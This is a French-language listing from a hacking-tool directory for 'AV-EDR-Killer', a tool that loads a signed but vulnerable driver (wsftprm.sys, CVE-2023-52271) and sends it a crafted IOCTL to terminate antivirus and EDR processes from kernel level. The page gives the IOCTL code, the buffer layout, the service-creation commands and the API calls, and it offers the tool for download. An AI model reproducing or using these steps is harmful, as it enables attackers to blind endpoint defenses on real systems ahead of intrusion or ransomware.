Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
AV-EDR-Killer — Arrêt des processus AV/EDR en exploitant un pilote vulnérable (BYOVD) | Kitploit
Outils/GitHubGitHub/xm0kht4r/av-edr-killer
Escalade de PrivilègesMécanismes de PersistanceExploitationÉvasion IDS/IPSMouvement LatéralPost-ExploitationCommandement et ContrôleRed Teaming
GitHubxm0kht4r/av-edr-killer

AV-EDR-Killer

Arrêt des processus AV/EDR en exploitant un pilote vulnérable (BYOVD)

Voir le dépôt
29646il y a 7 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Tueur d'AV/EDR

https://github.com/user-attachments/assets/1eda3340-2af2-4136-b74e-be7a3f4b3924

Ce projet démontre comment un pilote légitime et signé peut être transformé en arme pour obtenir un accès au niveau noyau.

🚨 Le pilote vulnérable:

wsftprm.sys , signé par TPZ SOLUCOES DIGITAIS LTDA, et précédemment exposé à une vulnérabilité d'élévation de privilèges locale divulguée publiquement sous le nom CVE-2023-52271, mais qui, pour une raison quelconque, n'est toujours PAS sur la liste de blocage des pilotes de Microsoft !! 🤫🤫

La vulnérabilité est déclenchée via le code IOCTL 0x22201C avec un tampon de 1036 octets dont les 4 premiers octets contiennent l'ID du processus cible sous forme de DWORD. Le pilote vulnérable, après avoir reçu cet IOCTL malveillant via DeviceIoControl, invoque la fonction importée ZwTerminateProcess, accordant à toute application en mode utilisateur des capacités de terminaison de processus au niveau noyau.

Tout acteur de menace sensé priorisera naturellement cette capacité pour terminer les processus critiques d'antivirus (AV) et de détection et réponse aux endpoints (EDR).

⚡ Exploitation:

1. Enregistrer un service:

Lancez cmd.exe avec les privilèges d'administrateur et enregistrez un service de pilote noyau avec le type "kernel" et binPath pointant vers l'emplacement du pilote vulnérable.

root@kitploit:~
> sc create MalDriver binPath= <path> type= Kernel`
> sc start MalDriver

Une fois chargé, le pilote crée un lien symbolique accessible en mode utilisateur sous \.\Warsaw_PM. Que nous pouvons utiliser pour obtenir un handle vers le périphérique du pilote à l'aide de l'appel API CreateFileW.

root@kitploit:~
> CreateFileW(device_name.as_ptr(), GENERIC_READ | GENERIC_WRITE, 0, ptr::null_mut(), OPEN_EXISTING, 0, ptr::null_mut())

Pour envoyer les IOCTL malveillants, nous utiliserons DeviceIoControl avec le code 0x22201C et un tampon contenant un PID dans ses 4 premiers octets

root@kitploit:~
> DeviceIoControl(self.hDriver, 0x22201C, buffer.as_mut_ptr() as LPVOID, buffer.len() as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

2. Profit

Cargo build --release pour générer le binaire.

🛠️ Personnalisation:

Vous pouvez ajouter des processus supplémentaires à la liste des cibles à terminer.

🔒 AVERTISSEMENT

Vous êtes responsable de vous assurer que vous disposez des autorisations appropriées avant d'utiliser cet outil. L'auteur décline toute responsabilité en cas d'utilisation abusive.

🤝 Collaborations

Les contributions et suggestions sont les bienvenues ! Si vous avez des idées, des améliorations ou souhaitez collaborer, n'hésitez pas à me contacter à : [email protected]

Télécharger l’outil